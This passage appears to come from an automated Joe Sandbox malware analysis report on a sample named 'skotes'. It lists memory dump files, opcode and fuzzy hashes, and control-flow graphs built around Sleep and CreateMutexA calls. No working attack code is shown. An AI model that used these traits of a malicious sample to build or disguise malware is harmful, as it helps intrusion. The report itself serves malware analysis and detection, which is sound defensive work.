                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: e4b8dbce72d5a43f3a9e6c5673f1a215ad8c952a69a9f4f574b4801d5ebb3d69
                                                                                                                                                                                            • Instruction ID: 1ebbd542f96647178ad6d8b9f80f7b311852c18638ff6da1be57b5b0373334b2
                                                                                                                                                                                            • Opcode Fuzzy Hash: e4b8dbce72d5a43f3a9e6c5673f1a215ad8c952a69a9f4f574b4801d5ebb3d69
                                                                                                                                                                                            • Instruction Fuzzy Hash: A4312931B802048BFB0C9BBCDD857AFB6A7AB86314F248659E414973D6C7B55A808762

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 22 609f44-609f64 26 609f92-609fae 22->26 27 609f66-609f72 22->27 28 609fb0-609fbc 26->28 29 609fdc-609ffb 26->29 30 609f74-609f82 27->30 31 609f88-609f8f call 61d663 27->31 34 609fd2-609fd9 call 61d663 28->34 35 609fbe-609fcc 28->35 36 60a029-60a916 call 6180c0 29->36 37 609ffd-60a009 29->37 30->31 32 60a92b 30->32 31->26 39 60a953-60a994 Sleep CreateMutexA 32->39 40 60a92b call 636c6a 32->40 34->29 35->32 35->34 43 60a00b-60a019 37->43 44 60a01f-60a026 call 61d663 37->44 52 60a996-60a998 39->52 53 60a9a7-60a9a8 39->53 40->39 43->32 43->44 44->36 52->53 54 60a99a-60a9a5 52->54 54->53
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: 9ed794f2f08a53614040982c22ff979b0f6ab30da0c6b9383c0f37598d3e876e
                                                                                                                                                                                            • Instruction ID: 1646af7795b928f25f5c38759334564e9f5325aca7d428551c87f4194c9075eb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ed794f2f08a53614040982c22ff979b0f6ab30da0c6b9383c0f37598d3e876e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 18314831B802049BEB0C9BACD8847AEB763EF86314F248619E414EB3D6C7755AC08762

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 56 60a079-60a099 60 60a0c7-60a0e3 56->60 61 60a09b-60a0a7 56->61 64 60a111-60a130 60->64 65 60a0e5-60a0f1 60->65 62 60a0a9-60a0b7 61->62 63 60a0bd-60a0c4 call 61d663 61->63 62->63 66 60a930-60a994 call 636c6a Sleep CreateMutexA 62->66 63->60 70 60a132-60a13e 64->70 71 60a15e-60a916 call 6180c0 64->71 68 60a0f3-60a101 65->68 69 60a107-60a10e call 61d663 65->69 86 60a996-60a998 66->86 87 60a9a7-60a9a8 66->87 68->66 68->69 69->64 76 60a140-60a14e 70->76 77 60a154-60a15b call 61d663 70->77 76->66 76->77 77->71 86->87 88 60a99a-60a9a5 86->88 88->87
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: 33b35186f8e0bb28bedac0c06f00dffa703eb4a047b3781a8d1c9c3b8a8d444d
                                                                                                                                                                                            • Instruction ID: ec9833f20f7329dd2e47c68aec597a363ff720f6d4aec8c38b54fa26944d3b5c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 33b35186f8e0bb28bedac0c06f00dffa703eb4a047b3781a8d1c9c3b8a8d444d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 08313531B902049BEB0C9BBCCD84BAEB763DB82314F248658E415EB3D5C7769AC08752

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 90 60a1ae-60a1ce 94 60a1d0-60a1dc 90->94 95 60a1fc-60a218 90->95 98 60a1f2-60a1f9 call 61d663 94->98 99 60a1de-60a1ec 94->99 96 60a246-60a265 95->96 97 60a21a-60a226 95->97 102 60a293-60a916 call 6180c0 96->102 103 60a267-60a273 96->103 100 60a228-60a236 97->100 101 60a23c-60a243 call 61d663 97->101 98->95 99->98 104 60a935 99->104 100->101 100->104 101->96 107 60a275-60a283 103->107 108 60a289-60a290 call 61d663 103->108 110 60a953-60a994 Sleep CreateMutexA 104->110 111 60a935 call 636c6a 104->111 107->104 107->108 108->102 120 60a996-60a998 110->120 121 60a9a7-60a9a8 110->121 111->110 120->121 122 60a99a-60a9a5 120->122 122->121
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
